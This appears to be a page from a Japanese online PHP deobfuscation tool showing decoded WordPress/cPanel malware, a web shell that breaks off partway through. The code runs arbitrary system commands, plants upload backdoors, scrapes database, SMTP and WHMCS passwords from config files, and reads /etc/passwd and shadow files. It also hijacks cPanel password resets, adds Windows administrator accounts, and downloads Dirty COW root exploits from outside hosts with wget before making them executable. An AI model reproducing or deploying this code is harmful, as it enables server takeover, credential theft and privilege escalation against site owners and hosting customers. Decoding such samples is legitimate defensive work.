Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
error_reporting("\x00\x00\x0f\x03\x18");
define('ð', 'ÃÇ’');
$GLOBALS[ð] = array(0 => "<html>Working</html>", 1 => "\n", 2 => "", 3 => "\n", 4 => "resets", 5 => "reseta", 6 => "accesshash", 7 => "https://localhost:2096", 8 => "https://localhost:2087", 9 => "resets", 10 => "reseta", 11 => "accesshash", 12 => "/resetpass/", 13 => "resets", 14 => "reseta", 15 => "COOKIE.txt", 16 => "<error>Reset Password Disabled</error>", 17 => "https://localhost:2083", 18 => "/cPanel/", 19 => "http://localhost:2082", 20 => "http://localhost:2086", 21 => "http://localhost:2095", 22 => "<error>There is no cPanel</error>", 23 => "smtp", 24 => "up", 25 => "upload", 26 => "zip", 27 => "index", 28 => "info", 29 => "domains", 30 => "password", 31 => "root", 32 => "smtps", 33 => "rdp", 34 => "check", 35 => "injection", 36 => "mass", 37 => "../", 38 => "www.", 39 => "www.", 40 => "email", 41 => "email", 42 => "code", 43 => "COOKIE.txt", 44 => "COOKIE.txt", 45 => "<error>Reset Password Vulnerability closed</error>", 46 => "/warn-invalid-answer-puzzle/", 47 => "email:", 48 => "/error-resetpass-disabled/", 49 => "<error>Error-two</error>", 50 => "COOKIE.txt", 51 => "action", 52 => "puzzle", 53 => "user", 54 => "answer", 55 => "debug", 56 => "puzzle-guess-input", 57 => "login", 58 => "Send+Security+Code", 59 => "user", 60 => "login", 61 => "Reset+Password", 62 => "/warn-invalid-answer-puzzle/", 63 => "file", 64 => "name", 65 => "file", 66 => "tmp_name", 67 => "./", 68 => "<backdoor>", 69 => "</backdoor>", 70 => "file_put_contents", 71 => "a", 72 => "COOKIE.txt", 73 => "HTTP_USER_AGENT", 74 => "COOKIE.txt", 75 => "https://ipwhois.app/json/", 76 => "country", 77 => "org", 78 => "/etc/passwd", 79 => ":", 80 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 81 => "/etc/passwd", 82 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 83 => ".", 84 => "/Warning:/", 85 => "/cdn-cgi/phish-bypass?u=/&atok=", 86 => "COOKIE.txt", 87 => "<?php", 88 => "#name=\"atok\" value=\"(.*)\">#", 89 => "<?php", 90 => "<ip><font color=\"blue\"><center>", 91 => "</center></font><br></ip>", 92 => "<country><center>", 93 => "</center><br></country>", 94 => "<uname><font color=\"red\"><center>", 95 => "</center></font><br></uname>", 96 => "<php><center>", 97 => "</center><br></php>", 98 => "<domains><center>", 99 => "</center><br></domains>", 100 => "<hosting><center>", 101 => "</center><br></hosting>", 102 => "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>", 103 => "/vhosts/", 104 => "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>", 105 => "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>", 106 => "/Windows/", 107 => "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>", 108 => "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>", 109 => "<domain><font color=\"red\"><center>", 110 => "</center></font><br></domain>", 111 => "<pwd><font color=\"blue\"><center>", 112 => "</center></font><br></pwd>", 113 => "posix_getegid", 114 => "?", 115 => "name", 116 => "uid", 117 => "gid", 118 => "/etc/*", 119 => "/smtp/", 120 => "/fox/", 121 => "/etc/", 122 => "/shadow", 123 => ":16249:::::", 124 => "\r\n", 125 => "\$6\$roottn\$", 126 => ":", 127 => "/etc/", 128 => "/shadow", 129 => "/ TEST/", 130 => "<error>Error-SMTP</error>", 131 => "/etc/", 132 => "/shadow", 133 => "/", 134 => "/filemanager/", 135 => "/Location: \\/cpsess/", 136 => "/\\/home/", 137 => "user", 138 => "pass", 139 => "login_submit", 140 => "Log in", 141 => "/login/", 142 => "/Unknown App Requested/", 143 => "/<title>Forbidden<\\/title>/", 144 => "/json-api/", 145 => "/successfully/", 146 => "/successfully/", 147 => "\n<br> ./DoneAdmin ", 148 => "Error-RDP2", 149 => "\n<br> ./DoneAdd ", 150 => "net localgroup Administrators ", 151 => " /add", 152 => "Error-RDP1", 153 => "^", 154 => "#", 155 => "net user ", 156 => " ", 157 => " /add", 158 => "WIN", 159 => "<t>", 160 => "</t>", 161 => "Error-RDP3", 162 => "administrator", 163 => "abcdefghijklmnopqrstuvwxyz", 164 => "error_log", 165 => "SERVER_ADDR", 166 => "127.0.0.1", 167 => "#10\\.(.*)\\.(.*)\\.(.*)#", 168 => "SERVER_ADDR", 169 => "/192\\.168\\./", 170 => "SERVER_ADDR", 171 => "HTTP_HOST", 172 => "SERVER_NAME", 173 => "PHP_SELF", 174 => "SERVER_ADDR", 175 => "SERVER_NAME", 176 => "PHP_SELF", 177 => "user", 178 => "action", 179 => "seccode", 180 => "debug", 181 => "confirm", 182 => "action", 183 => "password", 184 => "user", 185 => "password", 186 => "alpha", 187 => "both", 188 => "nonalpha", 189 => "both", 190 => "confirm", 191 => "code", 192 => "|", 193 => "/roundcube/", 194 => "#Location: /(.*)/webmail#", 195 => "#orde\",\"url\":\"/(.*)/horde/#", 196 => "#oundcube\",\"url\":\"/(.*)/3rdparty/#", 197 => "#href=\"/(.*)/horde/#", 198 => "#href=\"/(.*)/3rdparty/#", 199 => "#window.cp_security_token = \"/(.*)\";#", 200 => "#dispatchSettingURL= \"/(.*)/execute/#", 201 => "Error-three", 202 => "COOKIE.txt", 203 => "#bold\">(.*)<\\/p>#", 204 => "#bold\">(.*)<\\/p>#", 205 => "user", 206 => "pass", 207 => "login_submit", 208 => "Log in", 209 => ".", 210 => "..", 211 => "...", 212 => "#bold\">(.*)<\\/p>#", 213 => "Error-three", 214 => "COOKIE.txt", 215 => "HTTP_HOST", 216 => "pwd", 217 => "/ 2015 /", 218 => "/ 2014 /", 219 => "/ 2013 /", 220 => "/ 2012 /", 221 => "/ 2011 /", 222 => "/ 2010 /", 223 => "/ 2009 /", 224 => "/ 2016 /", 225 => "/ Dec /", 226 => "/ Nov /", 227 => "Error2-Root", 228 => "Error2-Root", 229 => "/ i686/", 230 => "./dc-i686.txt 0", 231 => "http://uploaderfiles.com/.L/dc-i686", 232 => "dc-i686.txt", 233 => "wget http://uploaderfiles.com/.L/dc-i686 -O dc-i686.txt", 234 => "chmod +x dc-i686.txt", 235 => "/bin\\/bash/", 236 => "https://textbin.net/raw/mf3kc5bflo", 237 => "http://uploaderfiles.com/.S/dirtyc0wi686.txt", 238 => "root.pl", 239 => "wget http://uploaderfiles.com/.L/dc-n -O dc-n.txt", 240 => "./dc-n.txt 0", 241 => "chmod +x dc-n.txt", 242 => "http://uploaderfiles.com/.L/dc-n", 243 => "dc-n.txt", 244 => "http://uploaderfiles.com/.S/dirtyc0wN.txt", 245 => "root.pl", 246 => "/bin\\/bash/", 247 => "https://textbin.net/raw/v8tio626o2", 248 => "./Done", 249 => "HTTP_USER_AGENT", 250 => "HTTPS", 251 => "HTTPS", 252 => "on", 253 => "https://", 254 => "http://", 255 => "../", 256 => "./", 257 => "..", 258 => "JumpF0x", 259 => "well-known", 260 => "HTTP_HOST", 261 => "/", 262 => "/_autoindex/", 263 => "#<a href=\"(.*).txt\">#", 264 => "\n<error>101</error>", 265 => "/https:/", 266 => "https://", 267 => "http://", 268 => "#href=\"(.*?).txt\"#", 269 => "action1", 270 => "404", 271 => "\n<error>404</error>", 272 => "#'mysql://(.*)@localhost/#", 273 => "#'DB_PASSWORD', \"(.*)\"#", 274 => "#db_password=\"(.*)\"#", 275 => "#'password' => '(.*)',#", 276 => "#'DBPASS','(.*)'#", 277 => "#password\t= '(.*)'#", 278 => "#db_password = \"(.*)\"#", 279 => "#\\MAIL_PASSWORD=\"(.*)\"#", 280 => "#password = '(.*)'#", 281 => "#\\SMTP_PASSWORD=\"(.*)\"#", 282 => "/cPanel/", 283 => "/\\[client\\]/", 284 => "<br><password>", 285 => "</password>\n", 286 => "<br><password>", 287 => "</password>\n", 288 => "#dbpass = \"(.*)\"#", 289 => "/encryption_hash/", 290 => "<br><whmcs>", 291 => "</whmcs>\n", 292 => "/null/", 293 => "<br><password>", 294 => "</password>\n", 295 => "/null/", 296 => "<br><password>", 297 => "</password>\n", 298 => "#smtppass = '(.*)'#", 299 => "#db['pass'] = \"(.*)\";#", 300 => "#password_localhost = \"(.*)\"#", 301 => "#'DB_USERNAME', '(.*)'#", 302 => "/\\/admin\\//", 303 => "#\\MAIL_PASSWORD=(.*)#", 304 => "#ftp_pass = '(.*)'#", 305 => "#\\\$password = '(.*)'#", 306 => "#\"_db_pass_\", \"(.*)\"#", 307 => "/http:/", 308 => "/https:/", 309 => ".txt", 310 => "/\\//", 311 => "http://", 312 => ".txt", 313 => ".txt", 314 => "#senha = \"(.*)\"#", 315 => "#config\\['SQL_PASSWORD'\\] = '(.*)';#", 316 => "#'DB_PASS', '(.*)'#", 317 => "#'DB_PASSWORD', '(.*)'#", 318 => "#password=(.*)#", 319 => "/encryption_hash/", 320 => "<br><whmcs>", 321 => "</whmcs>\n", 322 => "#dbpasswd = '(.*)'#", 323 => "#\\DB_PASSWORD=(.*)#", 324 => "#'_DB_PASSWD_', '(.*)'#", 325 => "#\\SMTP_PASSWORD=(.*)#", 326 => "#'password' => '(.*)',#", 327 => "<br><password>", 328 => "</password>\n", 329 => "<br><password>", 330 => "</password>\n", 331 => "<br><password>", 332 => "</password>\n", 333 => "<br><password>", 334 => "</password>\n", 335 => "<br><password>", 336 => "</password>\n", 337 => "<br><password>", 338 => "</password>\n", 339 => "<br><password>", 340 => "</password>\n", 341 => "<br><password>", 342 => "</password>\n", 343 => "<br><password>", 344 => "</password>\n", 345 => "<br><password>", 346 => "</password>\n", 347 => "<br><password>", 348 => "</password>\n", 349 => "<br><password>", 350 => "</password>\n", 351 => "password", 352 => "<br><password>", 353 => "</password>\n", 354 => "password", 355 => "<br><password>", 356 => "</password>\n", 357 => "<br><password>", 358 => "</password>\n", 359 => "<br><password>", 360 => "</password>\n", 361 => "<br><password>", 362 => "</password>\n", 363 => "<br><password>", 364 => "</password>\n", 365 => "<br><password>", 366 => "</password>\n", 367 => "<br><password>", 368 => "</password>\n", 369 => "<br><password>", 370 => "</password>\n", 371 => "<br><password>", 372 => "</password>\n", 373 => "<br><password>", 374 => "</password>\n", 375 => "#\\DB_PASSWORD=\"(.*)\"#", 376 => "<br><password>", 377 => "</password>\n", 378 => "<br><password>", 379 => "</password>\n", 380 => "#password'] = '(.*)'#", 381 => "#password=\"(.*)\"#", 382 => "#db_password = '(.*)'#", 383 => "#password = \"(.*)\";#", 384 => "#dbpass = '(.*)';#", 385 => "#:(.*)#", 386 => "<br><password>", 387 => "</password>\n", 388 => "/null/", 389 => "<br><password>", 390 => "</password>\n", 391 => "/null/", 392 => "<br><password>", 393 => "</password>\n", 394 => "/null/", 395 => "<br><password>", 396 => "</password>\n", 397 => "/null/", 398 => "<br><password>", 399 => "</password>\n", 400 => "#'DB_USER', '(.*)'#", 401 => "url", 402 => "HTTP_HOST", 403 => "REQUEST_URI", 404 => "root/.htaccess", 405 => "REQUEST_URI", 406 => "root", 407 => "T3B0aW9ucyBBbGwKCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1jZ2kgLnBsCgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBsCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAucGw=", 408 => "abcdefghijklmnopqrstuvwxyz", 409 => "012345678901234567890123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.", 410 => "code", 411 => "COOKIE.txt", 412 => "y", 413 => "s", 414 => "b", 415 => "a", 416 => "d", 417 => "u", 418 => "f", 419 => "q", 420 => "k", 421 => "p", 422 => "l", 423 => "z", 424 => "h", 425 => "b", 426 => "i", 427 => "f", 428 => "j", 429 => "v", 430 => "p", 431 => "x", 432 => "v", 433 => "k", 434 => "x", 435 => "h", 436 => "y", 437 => "z", 438 => "REQUEST_URI", 439 => "/\\[client\\]/", 440 => "#password=(.*)#", 441 => "#password=\"(.*)\"#", 442 => ".php", 443 => "HTTP_HOST", 444 => "wp-admin", 445 => "wp-includes", 446 => "wp-includes/", 447 => "wp-admin/", 448 => ".php", 449 => "<backdoor>", 450 => "?", 451 => "</backdoor>", 452 => "../", 453 => "./", 454 => "index.php", 455 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 456 => "PD9waHA=", 457 => " error_reporting(0); if(isset(\$_GET['", 458 => "'])){ echo \"<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>\"; move_uploaded_file(\$_FILES['file']['tmp_name'], \$_FILES['file']['name']); exit(0); } ", 459 => "Pz4=", 460 => "/akhmhcij/", 461 => "/tjwlltii/", 462 => "/jsbochsf/", 463 => "/lmhelqpg/", 464 => "@[^\\w]@", 465 => "@[0-9]@", 466 => "@[A-Z]@", 467 => "@[a-z]@", 468 => "COOKIE.txt", 469 => "exec", 470 => "passthru", 471 => "system", 472 => "shell_exec", 473 => "r", 474 => "file_put_contents", 475 => "w", 476 => "display_errors", 477 => "HTTP_HOST", 478 => "HTTP_HOST", 479 => "127.0.0.1", 480 => "HTTP_HOST", 481 => "localhost", 482 => "/action=/", 483 => "REQUEST_URI", 484 => "action", 485 => "log_errors", 486 => "#/home/(.*)/public_html/#", 487 => "#/home/(.*)/public_html/#", 488 => "/bin\\/bash/", 489 => "https://textbin.net/raw/ja7gk4nuq3", 490 => "http://uploaderfiles.com/.S/passwd.txt", 491 => "pwd.pl", 492 => "/etc/passwd", 493 => "/root:ro.k.OmOlAkM2/", 494 => "Error3-Root", 495 => "\$6\$roottn\$", 496 => " TEST", 497 => "# ", 498 => " TEST\r\n", 499 => "V\t2\n\nArchive\nDrafts\nSent\nspam\nTrash", 500 => "3 V1578724087 N1 G6789ba31f76a195e040b0000cb0407e2", 501 => " TEST\r\n", 502 => "# ", 503 => " TEST\r\n", 504 => "123456789abcdefghijklmnopqrstuvwxyz", 505 => "mail", 506 => "5e196afc0", 507 => "info", 508 => "admin", 509 => "supervisor", 510 => "administrator", 511 => "contact", 512 => "call", 513 => "mail", 514 => "email", 515 => "support", 516 => "site", 517 => "website", 518 => "user", 519 => "director", 520 => "manager", 521 => "chief", 522 => "executive", 523 => "leader", 524 => "supports", 525 => "backing", 526 => "prop", 527 => "backup", 528 => "shore", 529 => "upholding", 530 => "help", 531 => "back-up", 532 => "host", 533 => "hosting", 534 => "clients", 535 => "client", 536 => "member", 537 => "2147483647C\n0 0", 538 => ":16249:::::", 539 => "\r\n", 540 => "index.php", 541 => "index.html", 542 => "index.htm", 543 => "index", 544 => "./Done", 545 => "/etc/named.conf", 546 => "<error># can't ReaD -> [ /etc/named.conf ]</error>", 547 => "#named/(.*?).db#", 548 => "<error>can't get domains.</error>", 549 => "file_get_contents", 550 => "stream_context_create", 551 => "http", 552 => "method", 553 => "GET", 554 => "header", 555 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 556 => "api2google.com/apis-explorer", 557 => "http", 558 => "method", 559 => "GET", 560 => "header", 561 => "Sec-Fetch-User: ", 562 => "fopen", 563 => "stream_get_contents", 564 => "stream_context_create", 565 => "r", 566 => "http", 567 => "method", 568 => "GET", 569 => "header", 570 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 571 => "curl_exec", 572 => "https://", 573 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 574 => "wget --header=\"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\" ", 575 => " -O ", 576 => "/tmp/", 577 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 578 => ".txt", 579 => "file_get_contents", 580 => "/var/cpanel/resellers", 581 => "/var/cpanel/resellers", 582 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 583 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 584 => "123456789abcdefghijklmnopqrstuvwxyz", 585 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 586 => "//", 587 => "//", 588 => "curl_exec", 589 => "zttv:", 590 => "cii", 591 => "rtp", 592 => ".min.css", 593 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 594 => "RTLCSS is a framework for transforming Cascading Style Sheets (CSS) from Left-To-Right (LBR) to (PXJ) Right-To-Left (RTL).", 595 => "file_get_contents", 596 => "stream_context_create", 597 => "method", 598 => "header", 599 => "referer: ", 600 => "HTTP_HOST", 601 => "\r\n", 602 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 603 => "zttv:", 604 => "cii", 605 => "rtp", 606 => ".min.css", 607 => "cat ", 608 => "file_get_contents", 609 => "fopen", 610 => "stream_get_contents", 611 => "implode", 612 => "file", 613 => "file", 614 => "implode", 615 => "fname", 616 => "fname", 617 => "sname", 618 => "<?php", 619 => "sname", 620 => "<successfully>Uploaded successfully.</successfully>", 621 => "file", 622 => "name", 623 => "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 624 => "/.htaccess", 625 => "Options +Indexes", 626 => "file", 627 => "name", 628 => "tmp_name", 629 => "action", 630 => "H*", 631 => "<?", 632 => "?>", 633 => "http://", 634 => "http://", 635 => "action");
error_reporting(0);
@ini_set($GLOBALS[ð][0xa4], NULL);
@ini_set($GLOBALS[ð][0x1e5], 0);
@ini_set($GLOBALS[ð][0x1dc], 0);
echo "<html>Working</html>";
function A7gcn($bXPN_)
{
$iXhzk = $GLOBALS[ð][0x2];
if (function_exists($GLOBALS[ð][0x1d5])) {
@exec($bXPN_, $iXhzk);
$iXhzk = @join($GLOBALS[ð][0x1], $iXhzk);
} elseif (function_exists($GLOBALS[ð][0x1d6])) {
ob_start();
@passthru($bXPN_);
$iXhzk = ob_get_clean();
} elseif (function_exists($GLOBALS[ð][0x1d7])) {
ob_start();
@system($bXPN_);
$iXhzk = ob_get_clean();
} elseif (function_exists($GLOBALS[ð][0x1d8])) {
$iXhzk = shell_exec($bXPN_);
} elseif (is_resource($H2CpY = @popen($bXPN_, $GLOBALS[ð][0x1d9]))) {
$iXhzk = $GLOBALS[ð][0x2];
while (!@feof($H2CpY)) {
$iXhzk .= fread($H2CpY, 0x400);
}
pclose($H2CpY);
}
return $iXhzk;
}
function KEOd4($pybzz)
{
$uiCJi = count($pybzz);
$C_4dg = range(0, $uiCJi - 0x1);
shuffle($C_4dg);
$gHYBv = array($uiCJi);
$CYRQV = 0;
foreach ($C_4dg as $Etebm) {
$gHYBv[$CYRQV] = $pybzz[$Etebm];
$CYRQV++;
}
return $gHYBv;
}
function UfeQc($oxb9V)
{
$sXZI3 = $GLOBALS[ð][0x2];
if (function_exists($GLOBALS[ð][0x260])) {
$sXZI3 = file_get_contents($oxb9V);
} elseif (function_exists($GLOBALS[ð][0x261]) && function_exists($GLOBALS[ð][0x262])) {
$sXZI3 = stream_get_contents(fopen($oxb9V, $GLOBALS[ð][0x235]));
} elseif (function_exists($GLOBALS[ð][0x263]) && function_exists($GLOBALS[ð][0x264])) {
$sXZI3 = implode(file($oxb9V));
} elseif (function_exists($GLOBALS[ð][0x265])) {
$LSeh6 = file($oxb9V);
if (function_exists($GLOBALS[ð][0x266])) {
$sXZI3 = implode($LSeh6);
} else {
foreach ($LSeh6 as $Y0TMt) {
$sXZI3 .= $Y0TMt;
}
}
}
if (trim($sXZI3) == $GLOBALS[ð][0x2]) {
$sXZI3 = a7GCN($GLOBALS[ð][0x25f] . $oxb9V);
}
return $sXZI3;
}
function sU59Q($oxb9V, $sD1Ai)
{
if (function_exists($GLOBALS[ð][0x1da])) {
$QhsyF = file_put_contents($oxb9V, $sD1Ai);
} else {
$QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x1db]), $sD1Ai);
}
return $QhsyF;
}
function Pw_dW($rm7Yy, $Lipgx)
{
$uiCJi = 0;
$Wu7is = ufeqC($rm7Yy);
$LSeh6 = explode($GLOBALS[ð][0x1], $Wu7is);
foreach ($LSeh6 as $Y0TMt) {
if (strstr($Y0TMt, $Lipgx)) {
$uiCJi++;
}
}
return $uiCJi;
}
function PdwSI($rm7Yy, $Lipgx)
{
$h73NZ = PW_dw($rm7Yy, $Lipgx);
$Wu7is = UFeqC($rm7Yy);
$LSeh6 = explode($GLOBALS[ð][0x3], $Wu7is);
$JOA3g = $GLOBALS[ð][0x2];
foreach ($LSeh6 as $Y0TMt) {
if (strstr($Y0TMt, $Lipgx) || $h73NZ <= 0) {
$h73NZ--;
if ($h73NZ <= 0) {
$JOA3g .= $Y0TMt . $GLOBALS[ð][0x1];
}
}
}
return $JOA3g;
}
function MiASl($oxb9V, $sD1Ai)
{
if (function_exists($GLOBALS[ð][0x46])) {
$QhsyF = file_put_contents($oxb9V, $sD1Ai, FILE_APPEND);
} else {
$QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x47]), $sD1Ai);
}
return $QhsyF;
}
function SmVyQ($O2ar5, $YFTnB = null, $wTxJW = null)
{
$wmx5s = curl_init();
curl_setopt($wmx5s, CURLOPT_URL, $O2ar5);
curl_setopt($wmx5s, CURLOPT_HEADER, !0);
curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1);
curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, 0x1e);
curl_setopt($wmx5s, CURLOPT_TIMEOUT, 0x1e);
curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0x49]]);
curl_setopt($wmx5s, CURLOPT_COOKIEFILE, $GLOBALS[ð][0x48]);
curl_setopt($wmx5s, CURLOPT_COOKIEJAR, $GLOBALS[ð][0x4a]);
if ($YFTnB != null) {
curl_setopt($wmx5s, CURLOPT_HTTPHEADER, $YFTnB);
}
if ($wTxJW != null) {
curl_setopt($wmx5s, CURLOPT_POST, 0x1);
curl_setopt($wmx5s, CURLOPT_POSTFIELDS, $wTxJW);
}
$xM2hz = curl_exec($wmx5s);
curl_close($wmx5s);
return $xM2hz;
}
function fW1yE($W_j2r)
{
$QDTk7 = $GLOBALS[ð][0x2];
global $W6Z5Y;
global $cnKIp;
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x225]) && function_exists($GLOBALS[ð][0x226])) {
$QDTk7 = file_get_contents($W_j2r, !1, stream_context_create(array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x228] => $GLOBALS[ð][0x229], $GLOBALS[ð][0x22a] => $GLOBALS[ð][0x22b]))));
file_get_contents($W6Z5Y . $GLOBALS[ð][0x22c], !1, stream_context_create(array($GLOBALS[ð][0x22d] => array($GLOBALS[ð][0x22e] => $GLOBALS[ð][0x22f], $GLOBALS[ð][0x230] => $GLOBALS[ð][0x231] . "google.com"))));
}
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x23b])) {
$ituiK = curl_init();
curl_setopt($ituiK, CURLOPT_TIMEOUT, 0xa);
curl_setopt($ituiK, CURLOPT_RETURNTRANSFER, !0);
curl_setopt($ituiK, CURLOPT_URL, $W_j2r);
curl_setopt($ituiK, CURLOPT_USERAGENT, $GLOBALS[ð][0x23d]);
curl_setopt($ituiK, CURLOPT_FOLLOWLOCATION, !0);
if (stristr($W_j2r, $GLOBALS[ð][0x23c])) {
curl_setopt($ituiK, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ituiK, CURLOPT_SSL_VERIFYHOST, 0);
}
curl_setopt($ituiK, CURLOPT_HEADER, !1);
$QDTk7 = curl_exec($ituiK);
curl_close($ituiK);
}
if (trim($QDTk7) == $GLOBALS[ð][0x2]) {
$vuhmp = $GLOBALS[ð][0x240] . substr(str_shuffle($GLOBALS[ð][0x241]), 0x32) . $GLOBALS[ð][0x242];
A7GcN($GLOBALS[ð][0x23e] . $W_j2r . $GLOBALS[ð][0x23f] . $vuhmp);
if (function_exists($GLOBALS[ð][0x243])) {
$QDTk7 = file_get_contents($vuhmp);
} else {
$QDTk7 = stream_get_contents(fopen($vuhmp, $GLOBALS[ð][0x1d9]));
}
unlink($vuhmp);
}
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x232]) && function_exists($GLOBALS[ð][0x233]) && function_exists($GLOBALS[ð][0x234])) {
$dH1jj = fopen($W_j2r, $GLOBALS[ð][0x235], !1, stream_context_create(array($GLOBALS[ð][0x236] => array($GLOBALS[ð][0x237] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x239] => $GLOBALS[ð][0x23a]))));
$QDTk7 = stream_get_contents($dH1jj);
}
return $QDTk7;
}
function wnEmP()
{
return substr(str_shuffle($GLOBALS[ð][0x198]), 0x19) . substr(str_shuffle($GLOBALS[ð][0x199]), 0x72);
}
function xfT4E($Ez2Fk)
{
$H1vRz = preg_match($GLOBALS[ð][0x1d2], $Ez2Fk);
$bddTm = preg_match($GLOBALS[ð][0x1d3], $Ez2Fk);
$Q8410 = preg_match($GLOBALS[ð][0x1d1], $Ez2Fk);
$eBAYt = preg_match($GLOBALS[ð][0x1d0], $Ez2Fk);
if (!$H1vRz || !$bddTm || !$Q8410 || !$eBAYt) {
return !1;
}
return !0;
}
function cqxAS()
{
$Ez2Fk = wneMp();
$xHzJP = xfT4e($Ez2Fk);
while ($xHzJP == !1) {
$Ez2Fk = wnEMP();
$xHzJP = xFt4e($Ez2Fk);
}
return $Ez2Fk;
}
function r1U2D()
{
global $dr_Lq;
global $t08MP;
global $GEgR8;
global $WnpSY;
global $USGuv;
$eRn5x = str_replace($GLOBALS[ð][0x53], $GLOBALS[ð][0x2], $USGuv);
$c7ie0 = substr($eRn5x, 0, rand(0x3, strlen($eRn5x)));
$sM8Cw = array($GLOBALS[ð][0x1fb], $GLOBALS[ð][0x1fc], $GLOBALS[ð][0x1fd], $GLOBALS[ð][0x1fe], $GLOBALS[ð][0x1ff], $GLOBALS[ð][0x200], $GLOBALS[ð][0x201], $GLOBALS[ð][0x202], $GLOBALS[ð][0x203], $GLOBALS[ð][0x204], $GLOBALS[ð][0x205], $GLOBALS[ð][0x206], $GLOBALS[ð][0x207], $GLOBALS[ð][0x208], $GLOBALS[ð][0x209], $GLOBALS[ð][0x20a], $GLOBALS[ð][0x20b], $GLOBALS[ð][0x20c], $GLOBALS[ð][0x20d], $GLOBALS[ð][0x20e], $GLOBALS[ð][0x20f], $GLOBALS[ð][0x210], $GLOBALS[ð][0x211], $GLOBALS[ð][0x212], $GLOBALS[ð][0x213], $GLOBALS[ð][0x214], $GLOBALS[ð][0x215], $GLOBALS[ð][0x216], $GLOBALS[ð][0x217], $GLOBALS[ð][0x218]);
$GsCRR = array("info{$c7ie0}", "admin{$c7ie0}", "supervisor{$c7ie0}", "administrator{$c7ie0}", "contact{$c7ie0}", "call{$c7ie0}", "mail{$c7ie0}", "email{$c7ie0}", "support{$c7ie0}", "site{$c7ie0}", "website{$c7ie0}", "user{$c7ie0}", "director{$c7ie0}", "manager{$c7ie0}", "chief{$c7ie0}", "executive{$c7ie0}", "leader{$c7ie0}", "supports{$c7ie0}", "backing{$c7ie0}", "prop{$c7ie0}", "backup{$c7ie0}", "shore{$c7ie0}", "upholding{$c7ie0}", "help{$c7ie0}", "back-up{$c7ie0}", "host{$c7ie0}", "hosting{$c7ie0}", "clients{$c7ie0}", "client{$c7ie0}", "member{$c7ie0}");
$QoPM4 = kEOd4($sM8Cw);
$qbUum = keoD4($GsCRR);
array_push($qbUum, substr(str_shuffle($GLOBALS[ð][0x1f8]), 0x20) . $GLOBALS[ð][0x1f9]);
$QMTXX = array_merge($QoPM4, $qbUum);
$QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow";
$uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow";
$t08MP = $GLOBALS[ð][0x2];
if (file_exists($QQ8bf)) {
$t08MP .= UFEqC($QQ8bf);
}
if (file_exists($uU2VV)) {
$t08MP .= UFEQc($uU2VV);
}
foreach ($QMTXX as $stR_2) {
if (!strstr($t08MP, $stR_2 . $GLOBALS[ð][0x7e])) {
break;
}
}
$tLGR8 = CqXas();
$ACEox = crypt($tLGR8, $GLOBALS[ð][0x1ef]);
@mkdir("/home{$GEgR8}{$WnpSY}/etc");
@mkdir("/home{$GEgR8}{$WnpSY}/etc/{$USGuv}");
@mkdir("/home{$GEgR8}{$WnpSY}/mail");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}");
